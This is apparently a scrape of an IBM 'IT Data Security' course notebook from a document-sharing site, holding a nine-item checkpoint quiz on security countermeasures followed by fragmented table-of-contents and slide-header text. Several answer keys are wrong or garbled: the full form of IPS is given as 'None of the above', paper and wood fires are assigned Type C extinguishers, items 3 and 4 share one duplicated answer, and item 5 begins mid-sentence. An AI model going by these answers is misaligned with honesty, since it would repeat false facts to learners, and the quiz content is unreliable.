1. What is the role of a countermeasure?

– To analyse the threats
– To store data in case of a threat
– To assess the vulnerability in a system
– The answer is To minimize and mitigate the risks and thus the amount of data breaches are
minimized substantially
2. Which of the following is a countermeasure against malware?

– DMZ
– The answer is Anti-virus
– Biometric

Student Notebook

IBM Power Systems
3. What is the function of connection control?

– The answer is It prevents server resource overload by limiting connection rates, query rates,
and other variables for each database user
Profile violations
4. What is the function of IPS and Protocol Validation?

– The answer is It prevents server resource overload by limiting connection rates, query rates,
and other variables for each database user
Profile violations

V10.1
Student Notebook

IBM Power Systems
5. What is the function of Dynamic Profiling?

each database user
– The answer is It provides query access control to detect any unauthorized queries that may
lead to DOS. DOS attacks targeting platform vulnerabilities, for example, would be likely to
trigger both IPS and Dynamic Profile violations
6. Which of the following is a countermeasure for cross-site script forgery?

– Check and validate all form fields, hidden fields, headers, cookies, query strings, and parameters
against a rigorous specification
– Implement a stringent security policy
– The answer is Filter the script output to defeat XSS vulnerabilities and prevent them from
being transmitted to users

Student Notebook

IBM Power Systems
7. What is the full form of DMZ?

– Decentralized Mantrap Zone
– Demilitarized Metric Zone
– Demilitarized Zoom
– The answer is Demilitarized Zone
8. What is the full form of IPS?

– Intrusion Protection System
– Intruder Prevention System
– Intrusion Prevention System
– The answer is None of the above
9. Which type of fire extinguisher in used against paper and wood fire?
– Type A
– Type B
– The answer is Type C
– Type E

V10.1
backpg
Back page

It Security

Caricato da

Informazioni sul documento

Copyright

Formati disponibili

Condividi questo documento

Condividi o incorpora il documento

Opzioni di condivisione

Hai trovato utile questo documento?

Questo contenuto è inappropriato?

Copyright:

Formati disponibili

It Security

Caricato da

Copyright:

Formati disponibili

V10.

Unit . Data Security Threats. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . -1

© Copyright IBM Corp. 2015 Contents iii

Cryptographic Threats (7 of 7) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .-45

Unit 2. Data Security Threat Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-1

iv IT Data Security © Copyright IBM Corp. 2015

TOC Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-4

© Copyright IBM Corp. 2015 Contents v

Web-application Threat Techniques (51 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-63

Unit 3. Countermeasures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-1

vi IT Data Security © Copyright IBM Corp. 2015

TOC Countermeasures (19 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-40

Appendix A. Checkpoint solutions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A-1

Appendix B. Title . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B-1

© Copyright IBM Corp. 2015 Contents vii

viii IT Data Security © Copyright IBM Corp. 2015

© Copyright IBM Corp. 2015 Trademarks ix

x IT Data Security © Copyright IBM Corp. 2015

© Copyright IBM Corp. 2015 Course description xi

xiv IT Data Security © Copyright IBM Corp. 2015

What this unit is about

What you should be able to do

How you will check your progress

© Copyright IBM Corp. 2015 Unit 1. Data Security Threats 1-1

IBM ICE (Innovation Centre for Education)

IT Data Security – Data Security Threats

© Copyright IBM Corporation 2015 9.1

Figure 1-1. IT Data Security – Data Security Threats DS011.0

1-2 IT Data Security © Copyright IBM Corp. 2015

Unit objectives IBM ICE (Innovation Centre for Education)

After completing this unit, you should be able to:

© Copyright IBM Corporation 2015

Figure 1-2. Unit objectives DS011.0

© Copyright IBM Corp. 2015 Unit 1. Data Security Threats 1-3

Background IBM ICE (Innovation Centre for Education)

© Copyright IBM Corporation 2015

Figure 1-3. Background DS011.0

1-4 IT Data Security © Copyright IBM Corp. 2015

Case Study 1 IBM ICE (Innovation Centre for Education)

© Copyright IBM Corporation 2015

Figure 1-4. Case Study 1 DS011.0

© Copyright IBM Corp. 2015 Unit 1. Data Security Threats 1-5

Case Study 2 IBM ICE (Innovation Centre for Education)

© Copyright IBM Corporation 2015

Figure 1-5. Case Study 2 DS011.0

1-6 IT Data Security © Copyright IBM Corp. 2015

© Copyright IBM Corp. 2015 Unit 1. Data Security Threats 1-7

Case Study 3 IBM ICE (Innovation Centre for Education)

• Variable Annuity Life Insurance Co.

© Copyright IBM Corporation 2015

Figure 1-6. Case Study 3 DS011.0

1-8 IT Data Security © Copyright IBM Corp. 2015

Need of Data Security (1 of 2) IBM ICE (Innovation Centre for Education)

• An organization cannot run without a proper data security mechanism in place

© Copyright IBM Corporation 2015

Figure 1-7. Need of Data Security (1 of 2) DS011.0

Need of Data Security

© Copyright IBM Corp. 2015 Unit 1. Data Security Threats 1-9

Need of Data Security (2 of 2) IBM ICE (Innovation Centre for Education)

© Copyright IBM Corporation 2015

Figure 1-8. Need of Data Security (2 of 2) DS011.0

Need of Data Security

1-10 IT Data Security © Copyright IBM Corp. 2015

Importance of Data Security IBM ICE (Innovation Centre for Education)